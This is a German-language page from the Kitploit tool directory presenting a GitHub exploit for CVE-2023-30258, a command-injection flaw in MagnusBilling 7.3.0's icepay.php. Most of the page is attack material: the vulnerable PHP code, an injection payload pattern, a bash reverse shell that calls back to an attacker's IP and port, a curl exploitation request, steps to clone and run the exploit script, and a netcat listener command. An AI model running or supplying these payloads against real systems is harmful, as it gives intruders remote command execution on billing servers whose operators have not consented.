Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
magnus_billing_7.3.0_RCE_CVE-2023-30258 — RCE-Sicherheitslücke in der Magnus-Billing-PHP-Ressource | Kitploit
Tools/GitHubGitHub/kayl22/magnus_billing_7.3.0_rce_cve-2023-30258
Payload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubkayl22/magnus_billing_7.3.0_rce_cve-2023-30258

magnus_billing_7.3.0_RCE_CVE-2023-30258

RCE-Sicherheitslücke in der Magnus-Billing-PHP-Ressource

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 8 MonatenNoch nicht geprüft

magnus_billing_7.3.0_RCE_CVE-2023-30258

In magnus billing 7.3.0 gibt es eine Schwachstelle für Remote-Codeausführung im Parameter "democ" der Ressource "icepay.php", bei der Sie die Abfrage verlassen und den gewünschten Befehl ausführen können.

VERWUNDBARER CODE

root@kitploit:~
if (isset($_GET['democ'])) {
    if (strlen($_GET['democ']) > 5) {
        exec("touch " . $_GET['democ'] . '.txt');
    } else {
        exec("rm -rf *.txt");
    }
}

Der Parameter "democ" wird an exec() übergeben, um eine neue Datei zu erstellen, aber wie Sie sehen können, gibt es keinerlei Eingabebereinigung. Der Angreifer kann leicht aus dem touch-Befehl ausbrechen und einen Befehl ausführen oder sogar eine Reverse-Shell erhalten. Um die txt-Erweiterung zu umgehen, können wir einfach ein weiteres ";" am Ende der Zeichenkette hinzufügen. Das endgültige Payload würde wie folgt aussehen:

root@kitploit:~
testfile;<command>;testfile

und so würde es aussehen, wenn es an die exec()-Funktion übergeben wird:

root@kitploit:~
exec('touch testfile;<command>;testfile.txt');

z. B. Reverse-Shell:

root@kitploit:~
exec('touch testfile; bash -c "bash -i >& /dev/tcp/<ip>/<port> 0>&1";testfile.txt')

Ausnutzung >:D

Wir könnten curl verwenden, um uns eine Reverse-Shell zu holen, z. B.

root@kitploit:~
curl -X GET http://127.0.0.1:8080/lib/icepay/icepay.php?democ=testfile;<urlencoded_payload>;testfile

Oder wenn Sie es vorziehen, können Sie das Python-Skript aus diesem Repository verwenden. Installation:

root@kitploit:~
git clone https://github.com/kayl22/magnus_billing_7.3.0_RCE_CVE-2023-30258 # get the repository

cd ./magnus_billing_7.3.0_RCE_CVE-2023-30258                                # change directory

chmod +x ./magnusbilling_rce.py                                             # add execution permissions to the python script

Verwendung:

root@kitploit:~
./magnusbilling_rce.py -h                                                   # show help

./magnusbilling_rce.py -lh <attacker_ip> -lp <local_port> -u http://<ip/domain>:<port>/

Und nicht zuletzt: Denken Sie daran, einen Listener mit netcat zu starten:

root@kitploit:~
nc -nlvvp <local_port>
Tool herunterladen